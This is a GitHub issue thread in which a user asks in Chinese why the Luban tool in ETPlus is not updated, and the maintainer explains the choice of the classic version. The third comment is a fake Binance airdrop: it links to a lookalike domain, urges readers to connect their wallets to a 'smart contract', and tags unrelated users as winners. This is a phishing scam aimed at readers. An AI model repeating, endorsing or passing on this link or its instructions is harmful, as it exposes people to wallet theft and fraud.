### ISSUE TITLE
luban为啥不更新重构后的版本？

### ISSUE THREAD

**Issue by singleTree** [FlameskyDexive/ETPlus#3]

**Comment by FlameskyDexive** [comment]
当前鲁班版本用的Classic经典版，因为时间太少，于是基于IcePower的XET7的鲁班对ET8进行适配，所以还没有去研究新版。后续空闲的话会去看下新版luban的接入情况。

**Comment by fahirazm** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @juglans, @iabao, @jo0ger, @kgames, @KuNgia09, @collapsar-6, @MillionaireChen
